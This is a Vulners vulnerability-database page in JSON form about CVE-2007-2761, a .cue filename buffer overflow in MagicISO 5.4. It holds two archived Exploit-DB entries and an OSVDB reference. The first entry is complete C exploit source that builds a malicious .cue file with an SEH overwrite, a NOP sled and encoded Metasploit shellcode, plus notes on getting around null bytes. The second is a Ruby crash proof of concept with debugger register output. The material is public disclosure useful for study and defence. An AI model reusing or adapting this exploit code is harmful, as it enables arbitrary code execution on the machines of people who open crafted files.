Description

All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018

{"exploitdb": [{"lastseen": "2016-01-31T19:44:36", "osvdbidlist": ["36077"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MagicISO. CVE-2007-2761. Local exploit for windows platform", "reporter": "vade79", "published": "2007-05-23T00:00:00", "type": "exploitdb", "title": "MagicISO <= 5.4 build239 .cue File Local Buffer Overflow Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2761"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-05-23T00:00:00", "id": "EDB-ID:3975", "href": "https://www.exploit-db.com/exploits/3975/", "sourceData": "/*\r\n-- poc/demo for magiciso exploit, found by n00b\r\n-- by: v9@fakehalo.us\r\n\r\n-- original email reply comments:\r\n\r\nI actually looked into this when you posted this on milw0rm. I was able to get it to run arbitrary code, however it was so unreliable it wasn't worth me posting... however, it was informative.\r\n\r\nyou have control of several registers, however it's eax and edx(not ecx) that are most interesting... the next instructions that get called(and fault magiciso) are:\r\n\r\nMOV DWORD PTR DS:[EDX],EAX\r\nMOV DWORD PTR DS:[EAX+4],EDX\r\n\r\n...now, with that you can overwrite any 4byte area in memory with anything you want. the problem is you can't use null bytes(which is where the shellcode and the current SEH handler is(non-PEB)) in this situation. (and the 2nd MOV can trigger an exception, which you will want to overwrite the handler of)\r\n\r\nyou can possibly use other methods, like you mentioned(although i didnt try for this situation), but i chose to write SEH handler for that block (if you trigger it with a bunch of x's it will show up right under it in ollydbg)\r\n\r\nstep 1 for making the 0x00?????? (EDX) nullbyte:\r\nyou can just so happen to happen to overwrite this buffer with full control until the end of the buffer. so, when most (C) functions write to a buffer they will cap it with an 0x00 on the end, i just used that. so the overflow has to be an EXACT size for that to work.\r\n\r\nstep 2 for making the 0x00?????? (EAX) nullbyte:\r\nonce i had control of where i was writing EAX to (EDX), i had to figure out a way to make another nullbyte as that is where the shellcode was located. to do this i came up with overwriting the SEH handler off-by-one, overwriting a single throw-away byte into another memory address(that would never be used), and leaving the original null-byte that was already there.\r\n\r\nthe downside to this is there is there was nothing left to keep track of where the shellcode was, ie a simple CALL reg wasn't possible as by the time i gained control of EIP there was no trace of where i was...so it became a blind guess, and memory gets pretty scattered...never the less, it is exploitable, and i popped up several calc.exe's when testing :)\r\n\r\neven if not reliable, i found it an interesting workaround for null-bytes. carry on if you like, here's the code i was using to test(which is functional, just not reliable):\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#ifndef __USE_BSD\r\n#define __USE_BSD\r\n#endif\r\n#include <string.h>\r\n#include <strings.h>\r\n#include <signal.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n\r\n/* winXP SP2 home (24bit, the first byte(0x00) will not be used) */\r\n#define DFL_EAX 0xfd3ddd\r\n#define DFL_EDX 0x12fb37\r\n\r\n/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 */\r\n/* Encoder=PexFnstenvSub http://metasploit.com */\r\nstatic unsigned char x86_exec[] =\r\n\"\\x29\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x23\"\r\n\"\\x75\\xbf\\x4a\\x83\\xeb\\xfc\\xe2\\xf4\\xdf\\x9d\\xfb\\x4a\\x23\\x75\\x34\\x0f\"\r\n\"\\x1f\\xfe\\xc3\\x4f\\x5b\\x74\\x50\\xc1\\x6c\\x6d\\x34\\x15\\x03\\x74\\x54\\x03\"\r\n\"\\xa8\\x41\\x34\\x4b\\xcd\\x44\\x7f\\xd3\\x8f\\xf1\\x7f\\x3e\\x24\\xb4\\x75\\x47\"\r\n\"\\x22\\xb7\\x54\\xbe\\x18\\x21\\x9b\\x4e\\x56\\x90\\x34\\x15\\x07\\x74\\x54\\x2c\"\r\n\"\\xa8\\x79\\xf4\\xc1\\x7c\\x69\\xbe\\xa1\\xa8\\x69\\x34\\x4b\\xc8\\xfc\\xe3\\x6e\"\r\n\"\\x27\\xb6\\x8e\\x8a\\x47\\xfe\\xff\\x7a\\xa6\\xb5\\xc7\\x46\\xa8\\x35\\xb3\\xc1\"\r\n\"\\x53\\x69\\x12\\xc1\\x4b\\x7d\\x54\\x43\\xa8\\xf5\\x0f\\x4a\\x23\\x75\\x34\\x22\"\r\n\"\\x1f\\x2a\\x8e\\xbc\\x43\\x23\\x36\\xb2\\xa0\\xb5\\xc4\\x1a\\x4b\\x0b\\x67\\xa8\"\r\n\"\\x50\\x1d\\x27\\xb4\\xa9\\x7b\\xe8\\xb5\\xc4\\x16\\xde\\x26\\x40\\x5b\\xda\\x32\"\r\n\"\\x46\\x75\\xbf\\x4a\";\r\n\r\nstruct{\r\n unsigned int eax;\r\n unsigned int edx;\r\n char *file;\r\n char *dir;\r\n}tbl;\r\n\r\n/* lonely extern. */\r\nextern char *optarg;\r\n\r\n/* functions. */\r\nunsigned char write_cue(char *,unsigned int,unsigned int);\r\nvoid printe(char *,short);\r\nvoid usage(char *);\r\n\r\n/* start. */\r\nint main(int argc,char **argv){\r\n signed int chr=0;\r\n char *ptr;\r\n\r\n printf(\"[*] magiciso[v5.4/build 0239]: buffer overflow exploit.\\n\"\r\n \"[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\\n\"\r\n \"[*] found by: n00b\\n\\n\");\r\n\r\n tbl.eax=DFL_EAX;\r\n tbl.edx=DFL_EDX;\r\n\r\n while((chr=getopt(argc,argv,\"m:a:d:\"))!=EOF){\r\n switch(chr){\r\n case 'm':\r\n if(!tbl.dir){\r\n if(!(ptr=rindex(optarg,'/')))\r\n ptr=optarg;\r\n else ptr++;\r\n if(!(tbl.dir=(char *)strdup(optarg)))\r\n printe(\"main(): allocating memory failed\",1);\r\n if(!(tbl.file=(char *)malloc(strlen(ptr)+5)))\r\n printe(\"main(): allocating memory failed\",1);\r\n sprintf(tbl.file,\"%s.cue\",ptr); \r\n }\r\n break;\r\n case 'a':\r\n sscanf(optarg,\"%x\",&tbl.eax);\r\n break;\r\n case 'd':\r\n sscanf(optarg,\"%x\",&tbl.edx);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n\r\n if(((tbl.eax&0xff000000)>>24))\r\n printe(\"EAX address isn't 24bit/3 bytes.\",1);\r\n if(((tbl.edx&0xff000000)>>24))\r\n printe(\"EDX address isn't 24bit/3 bytes.\",1);\r\n\r\n if(!tbl.file)usage(argv[0]);\r\n\r\n printf(\"[*] directory:\\t\\t\\t%s\\n\",tbl.dir);\r\n printf(\"[*] filename:\\t\\t\\t%s/%s\\n\",tbl.dir,tbl.file);\r\n printf(\"[*] EAX address:\\t\\t0x[00]%.6x\\n\",tbl.eax);\r\n printf(\"[*] EDX address:\\t\\t0x[00]%.6x\\n\\n\",tbl.edx);\r\n\r\n if(mkdir(tbl.dir,0755))\r\n printe(\"failed to make directory.\",1);\r\n if(chdir(tbl.dir))\r\n printe(\"failed to chdir to new directory.\",1);\r\n\r\n if(write_cue(tbl.file,tbl.eax,tbl.edx))\r\n printe(\"failed to write to file.\",1);\r\n\r\n exit(0);\r\n}\r\n\r\n/* write the .cue file. */\r\nunsigned char write_cue(char *file,unsigned int eax,unsigned int edx){\r\n unsigned int i=0;\r\n unsigned int real_eax=eax-4;\r\n unsigned char filler='x';\r\n unsigned char nop=0x90;\r\n FILE *fs;\r\n if(!(fs=fopen(file, \"wb\")))return(1);\r\n\r\n /* the \"C:\" is to make the overflowed buffer a static size. */\r\n fprintf(fs,\"FILE \\\"C:\");\r\n for(i=0;i<1022;i++){\r\n fwrite(&filler,1,1,fs);\r\n }\r\n\r\n /* this is an unused byte, the off-by-one write that keeps */\r\n /* the original null-byte in the SEH handler making this written */\r\n /* to one byte above the SEH handler. (fills in EAX) */\r\n fwrite(&filler,1,1,fs);\r\n\r\n fwrite(&tbl.eax,3,1,fs);\r\n fwrite(&tbl.edx,3,1,fs);\r\n\r\n /* --- */\r\n /* overflown buffer stops here, putting a null-byte on */ \r\n /* the end of the string to keep the null-byte for EDX */\r\n\r\n fprintf(fs,\"\\\" BINARY\\nTRACK 01 MODE1/2355\\nINDEX 01 00:00:00\\n\");\r\n\r\n /* simply throwing the nops/shellcode into memory at the end of the file. */\r\n for(i=0;i<500;i++){\r\n fwrite(&nop,1,1,fs);\r\n }\r\n fwrite(&x86_exec,sizeof(x86_exec),1,fs);\r\n\r\n fclose(fs);\r\n return(0);\r\n}\r\n\r\n/* error! */\r\nvoid printe(char *err,short e){\r\n printf(\"[!] %s\\n\",err);\r\n if(e)exit(1);\r\n return;\r\n}\r\n\r\n/* usage. */\r\nvoid usage(char *progname){\r\n printf(\"syntax: %s [-ad] -m directory\\n\\n\",progname);\r\n printf(\" -m <dir>\\tdirectory to make and output .cue to.\\n\");\r\n printf(\" -a <addr>\\tEAX address, will become the SEH handler\"\r\n \" (0x[00]%.6x)\\n\",tbl.eax);\r\n printf(\" -d <addr>\\tEDX address, points to where the SEH handler is\"\r\n \" (0x[00]%.6x)\\n\\n\",tbl.edx);\r\n exit(0);\r\n}\r\n\r\n// milw0rm.com [2007-05-23]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3975/"}, {"lastseen": "2016-01-31T19:40:27", "osvdbidlist": ["36077"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MagicISO. CVE-2007-2761. Dos exploit for linux platform", "reporter": "n00b", "published": "2007-05-17T00:00:00", "type": "exploitdb", "title": "MagicISO <= 5.4 build239 - .cue Heap Overflow PoC", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2761"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-05-17T00:00:00", "id": "EDB-ID:3945", "href": "https://www.exploit-db.com/exploits/3945/", "sourceData": "#!/usr/bin/env ruby\r\n###################################\r\n#Credits to n00b for finding this bug.\r\n#Magic iso has a stacked based buffer over-flow when \r\n#We pass an overly-long file name inside the .cue file\r\n#We are able to control alot of the registers so\r\n#Command execution is possible,But im still learning \r\n#Which means this will get released as a dos poc for \r\n#now till i can get the help i need..Any way i will provide \r\n#The dubug info for you to see for your self..If any one \r\n#Decides to write a Local exploit for this please give \r\n#Credits to n00b..Ok on with the work of info collecting.\r\n#Vendor : http://www.magiciso.com/\r\n#Tested on win xp sp2.\r\n#I would also like to thank the people i emailed and pm about this\r\n#Shouts: ~ Str0ke ~ Marsu ~ SM ~ Aelphaeis ~ vade79\r\n# Thanx to all you guys who helped.\r\n###################################\r\n#...Debug info..\r\n# Program received signal SIGSEGV, Segmentation fault.\r\n# [Switching to thread 1092.0x314]\r\n# 0x0058f05e in ?? ()\r\n# (gdb) i r\r\n# eax 0x41414141 1094795585\r\n# ecx 0x41414141 1094795585\r\n# edx 0x41414141 1094795585\r\n# ebx 0x41414545 1094796613\r\n# esp 0x12f5c8 0x12f5c8\r\n# ebp 0x12f5ec 0x12f5ec\r\n# esi 0xf4e718 16049944\r\n# edi 0xf4eb1c 16050972\r\n# eip 0x58f05e 0x58f05e\r\n# eflags 0x10206 66054\r\n# cs 0x1b 27\r\n# ss 0x23 35\r\n# ds 0x23 35\r\n# es 0x23 35\r\n# fs 0x3b 59\r\n# gs 0x0 0\r\n# fctrl 0xffff1273 -60813\r\n# fstat 0xffff0000 -65536\r\n# ftag 0xffffffff -1\r\n# fiseg 0x0 0\r\n# fioff 0x0 0\r\n# foseg 0xffff0000 -65536\r\n# fooff 0x0 0\r\n# ---Type <return> to continue, or q <return> to quit---\r\n# fop 0x0 0\r\n# (gdb)\r\n###################################\r\n#As you can see from the debug info we control eax ecx edx..\r\n#The two registers shown, EAX and ECX, can be populated with user supplied addresses which are a part of the data that \r\n#is used to overflow the heap buffer. One of the address can be of a function pointer which needs to be overwritten, for \r\n#example UEF and the other can be address of user supplied code that needs to be executed.\r\n\r\n$VERBOSE=nil #~ Shut the fuck up Let me do it my way ruby's over-zealous warnings..\r\n\r\nHeader1 = \r\n \"\\x46\\x49\\x4c\\x45\\x20\\x22\"\r\n\r\n\r\nBof = 'A'* 2024\r\n\r\nHeader2 = \"\\x2e\\x42\\x49\\x4e\\x22\\x20\\x42\\x49\\x4e\\x41\\x52\\x59\\x0d\\x0a\\x20\"+\r\n \"\\x54\\x52\\x41\\x43\\x4b\\x20\\x30\\x31\\x20\\x4d\\x4f\\x44\\x45\\x31\\x2f\\x32\"+\r\n \"\\x33\\x35\\x32\\x0d\\x0a\\x20\\x20\\x20\\x49\\x4e\\x44\\x45\\x58\\x20\\x30\\x31\"+\r\n \"\\x20\\x30\\x30\\x3a\\x30\\x30\\x3a\\x30\\x30\"\r\n\r\nn00b = Header1 + Bof + Header2\r\n \r\nFile.open( \"MagicISO.cue\", \"w\" ) do |the_file|\r\n\r\nthe_file.puts (n00b)\r\n\r\nend\r\n\r\n# milw0rm.com [2007-05-17]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3945/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "references": [], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25325](https://secuniaresearch.flexerasoftware.com/advisories/25325/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0340.html\nISS X-Force ID: 34346\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3945\nFrSIRT Advisory: ADV-2007-1865\n[CVE-2007-2761](https://vulners.com/cve/CVE-2007-2761)\nBugtraq ID: 24029\n", "edition": 1, "reporter": "OSVDB", "published": "2007-05-18T06:48:57", "title": "MagicISO Maker CUE Filename Handling Memory Corruption", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-2761"], "modified": "2007-05-18T06:48:57", "href": "https://vulners.com/osvdb/OSVDB:36077", "id": "OSVDB:36077", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}